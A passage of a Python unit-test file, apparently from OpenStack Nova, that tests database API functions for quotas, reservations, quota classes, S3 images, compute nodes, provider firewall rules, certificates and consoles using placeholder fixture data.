param = {'name': 'test_1', 'user_id': 'test_user_id_1', 'type': 'ssh'}
self._create_key_pair(param)
db.key_pair_destroy(self.ctxt, param['user_id'], param['name'])
self.assertRaises(exception.KeypairNotFound, db.key_pair_get,
self.ctxt, param['user_id'], param['name'])
def test_key_pair_destroy_no_such_key(self):
param = {'name': 'test_1', 'user_id': 'test_user_id_1'}
self.assertRaises(exception.KeypairNotFound,
db.key_pair_destroy, self.ctxt,
param['user_id'], param['name'])
class QuotaTestCase(test.TestCase, ModelsObjectComparatorMixin):
"""Tests for db.api.quota_* methods."""
def setUp(self):
super(QuotaTestCase, self).setUp()
self.ctxt = context.get_admin_context()
def test_quota_create(self):
quota = db.quota_create(self.ctxt, 'project1', 'resource', 99)
self.assertEqual(quota.resource, 'resource')
self.assertEqual(quota.hard_limit, 99)
self.assertEqual(quota.project_id, 'project1')
def test_quota_get(self):
quota = db.quota_create(self.ctxt, 'project1', 'resource', 99)
quota_db = db.quota_get(self.ctxt, 'project1', 'resource')
self._assertEqualObjects(quota, quota_db)
def test_quota_get_all_by_project(self):
for i in range(3):
for j in range(3):
db.quota_create(self.ctxt, 'proj%d' % i, 'resource%d' % j, j)
for i in range(3):
quotas_db = db.quota_get_all_by_project(self.ctxt, 'proj%d' % i)
self.assertEqual(quotas_db, {'project_id': 'proj%d' % i,
'resource0': 0,
'resource1': 1,
'resource2': 2})
def test_quota_get_all_by_project_and_user(self):
for i in range(3):
for j in range(3):
db.quota_create(self.ctxt, 'proj%d' % i, 'resource%d' % j,
j - 1, user_id='user%d' % i)
for i in range(3):
quotas_db = db.quota_get_all_by_project_and_user(self.ctxt,
'proj%d' % i,
'user%d' % i)
self.assertEqual(quotas_db, {'project_id': 'proj%d' % i,
'user_id': 'user%d' % i,
'resource0': -1,
'resource1': 0,
'resource2': 1})
def test_quota_update(self):
db.quota_create(self.ctxt, 'project1', 'resource1', 41)
db.quota_update(self.ctxt, 'project1', 'resource1', 42)
quota = db.quota_get(self.ctxt, 'project1', 'resource1')
self.assertEqual(quota.hard_limit, 42)
self.assertEqual(quota.resource, 'resource1')
self.assertEqual(quota.project_id, 'project1')
def test_quota_update_nonexistent(self):
self.assertRaises(exception.ProjectQuotaNotFound,
db.quota_update, self.ctxt, 'project1', 'resource1', 42)
def test_quota_get_nonexistent(self):
self.assertRaises(exception.ProjectQuotaNotFound,
db.quota_get, self.ctxt, 'project1', 'resource1')
def test_quota_reserve_all_resources(self):
quotas = {}
deltas = {}
reservable_resources = {}
for i, resource in enumerate(quota.resources):
if isinstance(resource, quota.ReservableResource):
quotas[resource.name] = db.quota_create(self.ctxt, 'project1',
resource.name, 100)
deltas[resource.name] = i
reservable_resources[resource.name] = resource
usages = {'instances': 3, 'cores': 6, 'ram': 9}
instances = []
for i in range(3):
instances.append(db.instance_create(self.ctxt,
{'vcpus': 2, 'memory_mb': 3,
'project_id': 'project1'}))
usages['fixed_ips'] = 2
network = db.network_create_safe(self.ctxt, {})
for i in range(2):
address = '192.168.0.%d' % i
db.fixed_ip_create(self.ctxt, {'project_id': 'project1',
'address': address,
'network_id': network['id']})
db.fixed_ip_associate(self.ctxt, address,
instances[0].uuid, network['id'])
usages['floating_ips'] = 5
for i in range(5):
db.floating_ip_create(self.ctxt, {'project_id': 'project1'})
usages['security_groups'] = 3
for i in range(3):
db.security_group_create(self.ctxt, {'project_id': 'project1'})
usages['server_groups'] = 4
for i in range(4):
db.instance_group_create(self.ctxt, {'uuid': str(i),
'project_id': 'project1'})
reservations_uuids = db.quota_reserve(self.ctxt, reservable_resources,
quotas, quotas, deltas, None,
None, None, 'project1')
resources_names = reservable_resources.keys()
for reservation_uuid in reservations_uuids:
reservation = _reservation_get(self.ctxt, reservation_uuid)
usage = db.quota_usage_get(self.ctxt, 'project1',
reservation.resource)
self.assertEqual(usage.in_use, usages[reservation.resource],
'Resource: %s' % reservation.resource)
self.assertEqual(usage.reserved, deltas[reservation.resource])
self.assertIn(reservation.resource, resources_names)
resources_names.remove(reservation.resource)
self.assertEqual(len(resources_names), 0)
def test_quota_destroy_all_by_project(self):
reservations = _quota_reserve(self.ctxt, 'project1', 'user1')
db.quota_destroy_all_by_project(self.ctxt, 'project1')
self.assertEqual(db.quota_get_all_by_project(self.ctxt, 'project1'),
{'project_id': 'project1'})
self.assertEqual(db.quota_get_all_by_project_and_user(self.ctxt,
'project1', 'user1'),
{'project_id': 'project1', 'user_id': 'user1'})
self.assertEqual(db.quota_usage_get_all_by_project(
self.ctxt, 'project1'),
{'project_id': 'project1'})
for r in reservations:
self.assertRaises(exception.ReservationNotFound,
_reservation_get, self.ctxt, r)
def test_quota_destroy_all_by_project_and_user(self):
reservations = _quota_reserve(self.ctxt, 'project1', 'user1')
db.quota_destroy_all_by_project_and_user(self.ctxt, 'project1',
'user1')
self.assertEqual(db.quota_get_all_by_project_and_user(self.ctxt,
'project1', 'user1'),
{'project_id': 'project1',
'user_id': 'user1'})
self.assertEqual(db.quota_usage_get_all_by_project_and_user(
self.ctxt, 'project1', 'user1'),
{'project_id': 'project1',
'user_id': 'user1',
'fixed_ips': {'in_use': 2, 'reserved': 2}})
for r in reservations:
self.assertRaises(exception.ReservationNotFound,
_reservation_get, self.ctxt, r)
def test_quota_usage_get_nonexistent(self):
self.assertRaises(exception.QuotaUsageNotFound, db.quota_usage_get,
self.ctxt, 'p1', 'nonexitent_resource')
def test_quota_usage_get(self):
_quota_reserve(self.ctxt, 'p1', 'u1')
quota_usage = db.quota_usage_get(self.ctxt, 'p1', 'resource0')
expected = {'resource': 'resource0', 'project_id': 'p1',
'in_use': 0, 'reserved': 0, 'total': 0}
for key, value in expected.iteritems():
self.assertEqual(value, quota_usage[key])
def test_quota_usage_get_all_by_project(self):
_quota_reserve(self.ctxt, 'p1', 'u1')
expected = {'project_id': 'p1',
'resource0': {'in_use': 0, 'reserved': 0},
'resource1': {'in_use': 1, 'reserved': 1},
'fixed_ips': {'in_use': 2, 'reserved': 2}}
self.assertEqual(expected, db.quota_usage_get_all_by_project(
self.ctxt, 'p1'))
def test_quota_usage_get_all_by_project_and_user(self):
_quota_reserve(self.ctxt, 'p1', 'u1')
expected = {'project_id': 'p1',
'user_id': 'u1',
'resource0': {'in_use': 0, 'reserved': 0},
'resource1': {'in_use': 1, 'reserved': 1},
'fixed_ips': {'in_use': 2, 'reserved': 2}}
self.assertEqual(expected, db.quota_usage_get_all_by_project_and_user(
self.ctxt, 'p1', 'u1'))
def test_quota_usage_update_nonexistent(self):
self.assertRaises(exception.QuotaUsageNotFound, db.quota_usage_update,
self.ctxt, 'p1', 'u1', 'resource', in_use=42)
def test_quota_usage_update(self):
_quota_reserve(self.ctxt, 'p1', 'u1')
db.quota_usage_update(self.ctxt, 'p1', 'u1', 'resource0', in_use=42,
reserved=43)
quota_usage = db.quota_usage_get(self.ctxt, 'p1', 'resource0', 'u1')
expected = {'resource': 'resource0', 'project_id': 'p1',
'user_id': 'u1', 'in_use': 42, 'reserved': 43, 'total': 85}
for key, value in expected.iteritems():
self.assertEqual(value, quota_usage[key])
def test_quota_create_exists(self):
db.quota_create(self.ctxt, 'project1', 'resource1', 41)
self.assertRaises(exception.QuotaExists, db.quota_create, self.ctxt,
'project1', 'resource1', 42)
class QuotaReserveNoDbTestCase(test.NoDBTestCase):
"""Tests quota reserve/refresh operations using mock."""
def test_create_quota_usage_if_missing_not_created(self):
# Tests that QuotaUsage isn't created if it's already in user_usages.
resource = 'fake-resource'
project_id = 'fake-project'
user_id = 'fake_user'
session = mock.sentinel
quota_usage = mock.sentinel
user_usages = {resource: quota_usage}
with mock.patch.object(sqlalchemy_api, '_quota_usage_create') as quc:
self.assertFalse(sqlalchemy_api._create_quota_usage_if_missing(
user_usages, resource, None,
project_id, user_id, session))
self.assertFalse(quc.called)
def _test_create_quota_usage_if_missing_created(self, per_project_quotas):
# Tests that the QuotaUsage is created.
user_usages = {}
if per_project_quotas:
resource = sqlalchemy_api.PER_PROJECT_QUOTAS[0]
else:
resource = 'fake-resource'
project_id = 'fake-project'
user_id = 'fake_user'
session = mock.sentinel
quota_usage = mock.sentinel
with mock.patch.object(sqlalchemy_api, '_quota_usage_create',
return_value=quota_usage) as quc:
self.assertTrue(sqlalchemy_api._create_quota_usage_if_missing(
user_usages, resource, None,
project_id, user_id, session))
self.assertEqual(quota_usage, user_usages[resource])
# Now test if the QuotaUsage was created with a user_id or not.
if per_project_quotas:
quc.assert_called_once_with(
project_id, None, resource, 0, 0, None, session=session)
else:
quc.assert_called_once_with(
project_id, user_id, resource, 0, 0, None, session=session)
def test_create_quota_usage_if_missing_created_per_project_quotas(self):
self._test_create_quota_usage_if_missing_created(True)
def test_create_quota_usage_if_missing_created_user_quotas(self):
self._test_create_quota_usage_if_missing_created(False)
def test_is_quota_refresh_needed_in_use(self):
# Tests when a quota refresh is needed based on the in_use value.
for in_use in range(-1, 1):
# We have to set until_refresh=None otherwise mock will give it
# a value which runs some code we don't want.
quota_usage = mock.MagicMock(in_use=in_use, until_refresh=None)
if in_use < 0:
self.assertTrue(sqlalchemy_api._is_quota_refresh_needed(
quota_usage, max_age=0))
else:
self.assertFalse(sqlalchemy_api._is_quota_refresh_needed(
quota_usage, max_age=0))
def test_is_quota_refresh_needed_until_refresh_none(self):
quota_usage = mock.MagicMock(in_use=0, until_refresh=None)
self.assertFalse(sqlalchemy_api._is_quota_refresh_needed(quota_usage,
max_age=0))
def test_is_quota_refresh_needed_until_refresh_not_none(self):
# Tests different values for the until_refresh counter.
for until_refresh in range(3):
quota_usage = mock.MagicMock(in_use=0, until_refresh=until_refresh)
refresh = sqlalchemy_api._is_quota_refresh_needed(quota_usage,
max_age=0)
until_refresh -= 1
if until_refresh <= 0:
self.assertTrue(refresh)
else:
self.assertFalse(refresh)
self.assertEqual(until_refresh, quota_usage.until_refresh)
def test_refresh_quota_usages(self):
quota_usage = mock.Mock(spec=models.QuotaUsage)
quota_usage.in_use = 5
quota_usage.until_refresh = None
sqlalchemy_api._refresh_quota_usages(quota_usage, until_refresh=5,
in_use=6)
self.assertEqual(6, quota_usage.in_use)
self.assertEqual(5, quota_usage.until_refresh)
def test_calculate_overquota_no_delta(self):
deltas = {'foo': -1}
user_quotas = {'foo': 10}
overs = sqlalchemy_api._calculate_overquota({}, user_quotas, deltas,
{}, {})
self.assertFalse(overs)
def test_calculate_overquota_unlimited_quota(self):
deltas = {'foo': 1}
project_quotas = {}
user_quotas = {'foo': -1}
project_usages = {}
user_usages = {'foo': 10}
overs = sqlalchemy_api._calculate_overquota(
project_quotas, user_quotas, deltas, project_usages, user_usages)
self.assertFalse(overs)
def _test_calculate_overquota(self, resource, project_usages, user_usages):
deltas = {resource: 1}
project_quotas = {resource: 10}
user_quotas = {resource: 10}
overs = sqlalchemy_api._calculate_overquota(
project_quotas, user_quotas, deltas, project_usages, user_usages)
self.assertEqual(resource, overs[0])
def test_calculate_overquota_per_project_quota_overquota(self):
# In this test, user quotas are fine but project quotas are over.
resource = 'foo'
project_usages = {resource: {'total': 10}}
user_usages = {resource: {'total': 5}}
self._test_calculate_overquota(resource, project_usages, user_usages)
def test_calculate_overquota_per_user_quota_overquota(self):
# In this test, project quotas are fine but user quotas are over.
resource = 'foo'
project_usages = {resource: {'total': 5}}
user_usages = {resource: {'total': 10}}
self._test_calculate_overquota(resource, project_usages, user_usages)
class QuotaClassTestCase(test.TestCase, ModelsObjectComparatorMixin):
def setUp(self):
super(QuotaClassTestCase, self).setUp()
self.ctxt = context.get_admin_context()
def test_quota_class_get_default(self):
params = {
'test_resource1': '10',
'test_resource2': '20',
'test_resource3': '30',
}
for res, limit in params.items():
db.quota_class_create(self.ctxt, 'default', res, limit)
defaults = db.quota_class_get_default(self.ctxt)
self.assertEqual(defaults, dict(class_name='default',
test_resource1=10,
test_resource2=20,
test_resource3=30))
def test_quota_class_create(self):
qc = db.quota_class_create(self.ctxt, 'class name', 'resource', 42)
self.assertEqual(qc.class_name, 'class name')
self.assertEqual(qc.resource, 'resource')
self.assertEqual(qc.hard_limit, 42)
def test_quota_class_get(self):
qc = db.quota_class_create(self.ctxt, 'class name', 'resource', 42)
qc_db = db.quota_class_get(self.ctxt, 'class name', 'resource')
self._assertEqualObjects(qc, qc_db)
def test_quota_class_get_nonexistent(self):
self.assertRaises(exception.QuotaClassNotFound, db.quota_class_get,
self.ctxt, 'nonexistent', 'resource')
def test_quota_class_get_all_by_name(self):
for i in range(3):
for j in range(3):
db.quota_class_create(self.ctxt, 'class%d' % i,
'resource%d' % j, j)
for i in range(3):
classes = db.quota_class_get_all_by_name(self.ctxt, 'class%d' % i)
self.assertEqual(classes, {'class_name': 'class%d' % i,
'resource0': 0, 'resource1': 1, 'resource2': 2})
def test_quota_class_update(self):
db.quota_class_create(self.ctxt, 'class name', 'resource', 42)
db.quota_class_update(self.ctxt, 'class name', 'resource', 43)
self.assertEqual(db.quota_class_get(self.ctxt, 'class name',
'resource').hard_limit, 43)
def test_quota_class_update_nonexistent(self):
self.assertRaises(exception.QuotaClassNotFound, db.quota_class_update,
self.ctxt, 'class name', 'resource', 42)
def test_refresh_quota_usages(self):
quota_usages = mock.Mock()
sqlalchemy_api._refresh_quota_usages(quota_usages, until_refresh=5,
in_use=6)
class S3ImageTestCase(test.TestCase):
def setUp(self):
super(S3ImageTestCase, self).setUp()
self.ctxt = context.get_admin_context()
self.values = [uuidutils.generate_uuid() for i in xrange(3)]
self.images = [db.s3_image_create(self.ctxt, uuid)
for uuid in self.values]
def test_s3_image_create(self):
for ref in self.images:
self.assertTrue(uuidutils.is_uuid_like(ref.uuid))
self.assertEqual(sorted(self.values),
sorted([ref.uuid for ref in self.images]))
def test_s3_image_get_by_uuid(self):
for uuid in self.values:
ref = db.s3_image_get_by_uuid(self.ctxt, uuid)
self.assertTrue(uuidutils.is_uuid_like(ref.uuid))
self.assertEqual(uuid, ref.uuid)
def test_s3_image_get(self):
self.assertEqual(sorted(self.values),
sorted([db.s3_image_get(self.ctxt, ref.id).uuid
for ref in self.images]))
def test_s3_image_get_not_found(self):
self.assertRaises(exception.ImageNotFound, db.s3_image_get, self.ctxt,
100500)
def test_s3_image_get_by_uuid_not_found(self):
self.assertRaises(exception.ImageNotFound, db.s3_image_get_by_uuid,
self.ctxt, uuidutils.generate_uuid())
class ComputeNodeTestCase(test.TestCase, ModelsObjectComparatorMixin):
_ignored_keys = ['id', 'deleted', 'deleted_at', 'created_at', 'updated_at']
def setUp(self):
super(ComputeNodeTestCase, self).setUp()
self.ctxt = context.get_admin_context()
self.service_dict = dict(host='host1', binary='nova-compute',
topic=CONF.compute_topic, report_count=1,
disabled=False)
self.service = db.service_create(self.ctxt, self.service_dict)
self.compute_node_dict = dict(vcpus=2, memory_mb=1024, local_gb=2048,
vcpus_used=0, memory_mb_used=0,
local_gb_used=0, free_ram_mb=1024,
free_disk_gb=2048, hypervisor_type="xen",
hypervisor_version=1, cpu_info="",
running_vms=0, current_workload=0,
service_id=self.service['id'],
host=self.service['host'],
disk_available_least=100,
hypervisor_hostname='abracadabra104',
host_ip='127.0.0.1',
supported_instances='',
pci_stats='',
metrics='',
extra_resources='',
stats='', numa_topology='')
# add some random stats
self.stats = dict(num_instances=3, num_proj_12345=2,
num_proj_23456=2, num_vm_building=3)
self.compute_node_dict['stats'] = jsonutils.dumps(self.stats)
self.flags(reserved_host_memory_mb=0)
self.flags(reserved_host_disk_mb=0)
self.item = db.compute_node_create(self.ctxt, self.compute_node_dict)
def test_compute_node_create(self):
self._assertEqualObjects(self.compute_node_dict, self.item,
ignored_keys=self._ignored_keys + ['stats'])
new_stats = jsonutils.loads(self.item['stats'])
self.assertEqual(self.stats, new_stats)
def test_compute_node_get_all(self):
nodes = db.compute_node_get_all(self.ctxt)
self.assertEqual(1, len(nodes))
node = nodes[0]
self._assertEqualObjects(self.compute_node_dict, node,
ignored_keys=self._ignored_keys +
['stats', 'service'])
new_stats = jsonutils.loads(node['stats'])
self.assertEqual(self.stats, new_stats)
def test_compute_node_get_all_deleted_compute_node(self):
# Create a service and compute node and ensure we can find its stats;
# delete the service and compute node when done and loop again
for x in range(2, 5):
# Create a service
service_data = self.service_dict.copy()
service_data['host'] = 'host-%s' % x
service = db.service_create(self.ctxt, service_data)
# Create a compute node
compute_node_data = self.compute_node_dict.copy()
compute_node_data['service_id'] = service['id']
compute_node_data['stats'] = jsonutils.dumps(self.stats.copy())
compute_node_data['hypervisor_hostname'] = 'hypervisor-%s' % x
node = db.compute_node_create(self.ctxt, compute_node_data)
# Ensure the "new" compute node is found
nodes = db.compute_node_get_all(self.ctxt)
self.assertEqual(2, len(nodes))
found = None
for n in nodes:
if n['id'] == node['id']:
found = n
break
self.assertIsNotNone(found)
# Now ensure the match has stats!
self.assertNotEqual(jsonutils.loads(found['stats']), {})
# Now delete the newly-created compute node to ensure the related
# compute node stats are wiped in a cascaded fashion
db.compute_node_delete(self.ctxt, node['id'])
# Clean up the service
db.service_destroy(self.ctxt, service['id'])
def test_compute_node_get_all_mult_compute_nodes_one_service_entry(self):
service_data = self.service_dict.copy()
service_data['host'] = 'host2'
service = db.service_create(self.ctxt, service_data)
existing_node = dict(self.item.iteritems())
expected = [existing_node]
for name in ['bm_node1', 'bm_node2']:
compute_node_data = self.compute_node_dict.copy()
compute_node_data['service_id'] = service['id']
compute_node_data['stats'] = jsonutils.dumps(self.stats)
compute_node_data['hypervisor_hostname'] = name
node = db.compute_node_create(self.ctxt, compute_node_data)
node = dict(node.iteritems())
expected.append(node)
result = sorted(db.compute_node_get_all(self.ctxt),
key=lambda n: n['hypervisor_hostname'])
self._assertEqualListsOfObjects(expected, result,
ignored_keys=['stats'])
def test_compute_node_get_all_by_host_with_distinct_hosts(self):
# Create another service with another node
service2 = self.service_dict.copy()
service2['host'] = 'host2'
db.service_create(self.ctxt, service2)
compute_node_another_host = self.compute_node_dict.copy()
compute_node_another_host['stats'] = jsonutils.dumps(self.stats)
compute_node_another_host['hypervisor_hostname'] = 'node_2'
compute_node_another_host['host'] = 'host2'
node = db.compute_node_create(self.ctxt, compute_node_another_host)
result = db.compute_node_get_all_by_host(self.ctxt, 'host1', False)
self._assertEqualListsOfObjects([self.item], result)
result = db.compute_node_get_all_by_host(self.ctxt, 'host2', False)
self._assertEqualListsOfObjects([node], result)
def test_compute_node_get_all_by_host_with_same_host(self):
# Create another node on top of the same service
compute_node_same_host = self.compute_node_dict.copy()
compute_node_same_host['stats'] = jsonutils.dumps(self.stats)
compute_node_same_host['hypervisor_hostname'] = 'node_3'
node = db.compute_node_create(self.ctxt, compute_node_same_host)
expected = [self.item, node]
result = sorted(db.compute_node_get_all_by_host(
self.ctxt, 'host1', False),
key=lambda n: n['hypervisor_hostname'])
self._assertEqualListsOfObjects(expected, result,
ignored_keys=['stats'])
def test_compute_node_get_all_by_host_not_found(self):
self.assertRaises(exception.ComputeHostNotFound,
db.compute_node_get_all_by_host, self.ctxt, 'wrong')
def test_compute_nodes_get_by_service_id_one_result(self):
expected = [self.item]
result = db.compute_nodes_get_by_service_id(
self.ctxt, self.service['id'])
self._assertEqualListsOfObjects(expected, result,
ignored_keys=['stats'])
def test_compute_nodes_get_by_service_id_multiple_results(self):
# Create another node on top of the same service
compute_node_same_host = self.compute_node_dict.copy()
compute_node_same_host['stats'] = jsonutils.dumps(self.stats)
compute_node_same_host['hypervisor_hostname'] = 'node_2'
node = db.compute_node_create(self.ctxt, compute_node_same_host)
expected = [self.item, node]
result = sorted(db.compute_nodes_get_by_service_id(
self.ctxt, self.service['id']),
key=lambda n: n['hypervisor_hostname'])
self._assertEqualListsOfObjects(expected, result,
ignored_keys=['stats'])
def test_compute_nodes_get_by_service_id_not_found(self):
self.assertRaises(exception.ServiceNotFound,
db.compute_nodes_get_by_service_id, self.ctxt,
'fake')
def test_compute_node_get_by_host_and_nodename(self):
# Create another node on top of the same service
compute_node_same_host = self.compute_node_dict.copy()
compute_node_same_host['stats'] = jsonutils.dumps(self.stats)
compute_node_same_host['hypervisor_hostname'] = 'node_2'
node = db.compute_node_create(self.ctxt, compute_node_same_host)
expected = node
result = db.compute_node_get_by_host_and_nodename(
self.ctxt, 'host1', 'node_2')
self._assertEqualObjects(expected, result)
def test_compute_node_get_by_host_and_nodename_not_found(self):
self.assertRaises(exception.ComputeHostNotFound,
db.compute_node_get_by_host_and_nodename,
self.ctxt, 'host1', 'wrong')
def test_compute_node_get(self):
compute_node_id = self.item['id']
node = db.compute_node_get(self.ctxt, compute_node_id)
self._assertEqualObjects(self.compute_node_dict, node,
ignored_keys=self._ignored_keys + ['stats', 'service'])
new_stats = jsonutils.loads(node['stats'])
self.assertEqual(self.stats, new_stats)
def test_compute_node_update(self):
compute_node_id = self.item['id']
stats = jsonutils.loads(self.item['stats'])
# change some values:
stats['num_instances'] = 8
stats['num_tribbles'] = 1
values = {
'vcpus': 4,
'stats': jsonutils.dumps(stats),
}
item_updated = db.compute_node_update(self.ctxt, compute_node_id,
values)
self.assertEqual(4, item_updated['vcpus'])
new_stats = jsonutils.loads(item_updated['stats'])
self.assertEqual(stats, new_stats)
def test_compute_node_delete(self):
compute_node_id = self.item['id']
db.compute_node_delete(self.ctxt, compute_node_id)
nodes = db.compute_node_get_all(self.ctxt)
self.assertEqual(len(nodes), 0)
def test_compute_node_search_by_hypervisor(self):
nodes_created = []
new_service = copy.copy(self.service_dict)
for i in xrange(3):
new_service['binary'] += str(i)
new_service['topic'] += str(i)
service = db.service_create(self.ctxt, new_service)
self.compute_node_dict['service_id'] = service['id']
self.compute_node_dict['hypervisor_hostname'] = 'testhost' + str(i)
self.compute_node_dict['stats'] = jsonutils.dumps(self.stats)
node = db.compute_node_create(self.ctxt, self.compute_node_dict)
nodes_created.append(node)
nodes = db.compute_node_search_by_hypervisor(self.ctxt, 'host')
self.assertEqual(3, len(nodes))
self._assertEqualListsOfObjects(nodes_created, nodes,
ignored_keys=self._ignored_keys + ['stats', 'service'])
def test_compute_node_statistics(self):
stats = db.compute_node_statistics(self.ctxt)
self.assertEqual(stats.pop('count'), 1)
for k, v in stats.iteritems():
self.assertEqual(v, self.item[k])
def test_compute_node_statistics_disabled_service(self):
serv = db.service_get_by_host_and_topic(
self.ctxt, 'host1', CONF.compute_topic)
db.service_update(self.ctxt, serv['id'], {'disabled': True})
stats = db.compute_node_statistics(self.ctxt)
self.assertEqual(stats.pop('count'), 0)
def test_compute_node_statistics_with_old_service_id(self):
# NOTE(sbauza): This test is only for checking backwards compatibility
# with old versions of compute_nodes not providing host column.
# This test could be removed once we are sure that all compute nodes
# are populating the host field thanks to the ResourceTracker
service2 = self.service_dict.copy()
service2['host'] = 'host2'
db_service2 = db.service_create(self.ctxt, service2)
compute_node_old_host = self.compute_node_dict.copy()
compute_node_old_host['stats'] = jsonutils.dumps(self.stats)
compute_node_old_host['hypervisor_hostname'] = 'node_2'
compute_node_old_host['service_id'] = db_service2['id']
compute_node_old_host.pop('host')
db.compute_node_create(self.ctxt, compute_node_old_host)
stats = db.compute_node_statistics(self.ctxt)
self.assertEqual(2, stats.pop('count'))
def test_compute_node_statistics_with_other_service(self):
other_service = self.service_dict.copy()
other_service['topic'] = 'fake-topic'
other_service['binary'] = 'nova-fake'
db.service_create(self.ctxt, other_service)
stats = db.compute_node_statistics(self.ctxt)
data = {'count': 1,
'vcpus_used': 0,
'local_gb_used': 0,
'memory_mb': 1024,
'current_workload': 0,
'vcpus': 2,
'running_vms': 0,
'free_disk_gb': 2048,
'disk_available_least': 100,
'local_gb': 2048,
'free_ram_mb': 1024,
'memory_mb_used': 0}
for key, value in six.iteritems(data):
self.assertEqual(value, stats.pop(key))
def test_compute_node_not_found(self):
self.assertRaises(exception.ComputeHostNotFound, db.compute_node_get,
self.ctxt, 100500)
def test_compute_node_update_always_updates_updated_at(self):
item_updated = db.compute_node_update(self.ctxt,
self.item['id'], {})
self.assertNotEqual(self.item['updated_at'],
item_updated['updated_at'])
def test_compute_node_update_override_updated_at(self):
# Update the record once so updated_at is set.
first = db.compute_node_update(self.ctxt, self.item['id'],
{'free_ram_mb': '12'})
self.assertIsNotNone(first['updated_at'])
# Update a second time. Make sure that the updated_at value we send
# is overridden.
second = db.compute_node_update(self.ctxt, self.item['id'],
{'updated_at': first.updated_at,
'free_ram_mb': '13'})
self.assertNotEqual(first['updated_at'], second['updated_at'])
def test_service_destroy_with_compute_node(self):
db.service_destroy(self.ctxt, self.service['id'])
self.assertRaises(exception.ComputeHostNotFound,
db.compute_node_get, self.ctxt,
self.item['id'])
def test_service_destroy_with_old_compute_node(self):
# NOTE(sbauza): This test is only for checking backwards compatibility
# with old versions of compute_nodes not providing host column.
# This test could be removed once we are sure that all compute nodes
# are populating the host field thanks to the ResourceTracker
compute_node_old_host_dict = self.compute_node_dict.copy()
compute_node_old_host_dict.pop('host')
item_old = db.compute_node_create(self.ctxt,
compute_node_old_host_dict)
db.service_destroy(self.ctxt, self.service['id'])
self.assertRaises(exception.ComputeHostNotFound,
db.compute_node_get, self.ctxt,
item_old['id'])
class ProviderFwRuleTestCase(test.TestCase, ModelsObjectComparatorMixin):
def setUp(self):
super(ProviderFwRuleTestCase, self).setUp()
self.ctxt = context.get_admin_context()
self.values = self._get_rule_values()
self.rules = [db.provider_fw_rule_create(self.ctxt, rule)
for rule in self.values]
def _get_rule_values(self):
cidr_samples = ['192.168.0.0/24', '10.1.2.3/32',
'2001:4f8:3:ba::/64',
'2001:4f8:3:ba:2e0:81ff:fe22:d1f1/128']
values = []
for i in xrange(len(cidr_samples)):
rule = {}
rule['protocol'] = 'foo' + str(i)
rule['from_port'] = 9999 + i
rule['to_port'] = 9898 + i
rule['cidr'] = cidr_samples[i]
values.append(rule)
return values
def test_provider_fw_rule_create(self):
ignored_keys = ['id', 'deleted', 'deleted_at', 'created_at',
'updated_at']
for i, rule in enumerate(self.values):
self._assertEqualObjects(self.rules[i], rule,
ignored_keys=ignored_keys)
def test_provider_fw_rule_get_all(self):
self._assertEqualListsOfObjects(self.rules,
db.provider_fw_rule_get_all(self.ctxt))
def test_provider_fw_rule_destroy(self):
for rule in self.rules:
db.provider_fw_rule_destroy(self.ctxt, rule.id)
self.assertEqual([], db.provider_fw_rule_get_all(self.ctxt))
class CertificateTestCase(test.TestCase, ModelsObjectComparatorMixin):
def setUp(self):
super(CertificateTestCase, self).setUp()
self.ctxt = context.get_admin_context()
self.created = self._certificates_create()
def _get_certs_values(self):
base_values = {
'user_id': 'user',
'project_id': 'project',
'file_name': 'filename'
}
return [{k: v + str(x) for k, v in base_values.iteritems()}
for x in xrange(1, 4)]
def _certificates_create(self):
return [db.certificate_create(self.ctxt, cert)
for cert in self._get_certs_values()]
def test_certificate_create(self):
ignored_keys = ['id', 'deleted', 'deleted_at', 'created_at',
'updated_at']
for i, cert in enumerate(self._get_certs_values()):
self._assertEqualObjects(self.created[i], cert,
ignored_keys=ignored_keys)
def test_certificate_get_all_by_project(self):
cert = db.certificate_get_all_by_project(self.ctxt,
self.created[1].project_id)
self._assertEqualObjects(self.created[1], cert[0])
def test_certificate_get_all_by_user(self):
cert = db.certificate_get_all_by_user(self.ctxt,
self.created[1].user_id)
self._assertEqualObjects(self.created[1], cert[0])
def test_certificate_get_all_by_user_and_project(self):
cert = db.certificate_get_all_by_user_and_project(self.ctxt,
self.created[1].user_id, self.created[1].project_id)
self._assertEqualObjects(self.created[1], cert[0])
class ConsoleTestCase(test.TestCase, ModelsObjectComparatorMixin):
def setUp(self):
super(ConsoleTestCase, self).setUp()
self.ctxt = context.get_admin_context()
pools_data = [
{'address': '192.168.10.10',
'username': 'user1',
'password': 'passwd1',
'console_type': 'type1',
'public_hostname': 'public_host1',
'host': 'host1',
'compute_host': 'compute_host1',
},
{'address': '192.168.10.11',
'username': 'user2',
'password': 'passwd2',
'console_type': 'type2',
'public_hostname': 'public_host2',
'host': 'host2',
'compute_host': 'compute_host2',
},
]
self.console_pools = [db.console_pool_create(self.ctxt, val)
for val in pools_data]
instance_uuid = uuidutils.generate_uuid()
db.instance_create(self.ctxt, {'uuid': instance_uuid})
self.console_data = [{'instance_name': 'name' + str(x),
'instance_uuid': instance_uuid,
'password': 'pass' + str(x),
'port': 7878 + x,
'pool_id': self.console_pools[x]['id']}
for x in xrange(len(pools_data))]
self.consoles = [db.console_create(self.ctxt, val)
for val in self.console_data]
def test_console_create(self):
ignored_keys = ['id', 'deleted', 'deleted_at', 'created_at',
'updated_at']
for console in self.consoles:
self.assertIsNotNone(console['id'])
self._assertEqualListsOfObjects(self.console_data, self.consoles,
ignored_keys=ignored_keys)
def test_console_get_by_id(self):
console = self.consoles[0]
console_get = db.console_get(self.ctxt, console['id'])
self._assertEqualObjects(console, console_get,
ignored_keys=['pool'])
def test_console_get_by_id_uuid(self):
console = self.consoles[0]
console_get = db.console_get(self.ctxt, console['id'],
console['instance_uuid'])
self._assertEqualObjects(console, console_get,
ignored_keys=['pool'])
def test_console_get_by_pool_instance(self):
console = self.consoles[0]
console_get = db.console_get_by_pool_instance(self.ctxt,
console['pool_id'], console['instance_uuid'])
self._assertEqualObjects(console, console_get,
ignored_keys=['pool'])
def test_console_get_all_by_instance(self):
instance_uuid = self.consoles[0]['instance_uuid']
consoles_get = db.console_get_all_by_instance(self.ctxt, instance_uuid)
self._assertEqualListsOfObjects(self.consoles, consoles_get)
def test_console_get_all_by_instance_with_pool(self):
instance_uuid = self.consoles[0]['instance_uuid']
consoles_get = db.console_get_all_by_instance(self.ctxt, instance_uuid,
columns_to_join=['pool'])
self._assertEqualListsOfObjects(self.consoles, consoles_get,
ignored_keys=['pool'])
self._assertEqualListsOfObjects([pool for pool in self.console_pools],
[c['pool'] for c in consoles_get])
def test_console_get_all_by_instance_empty(self):
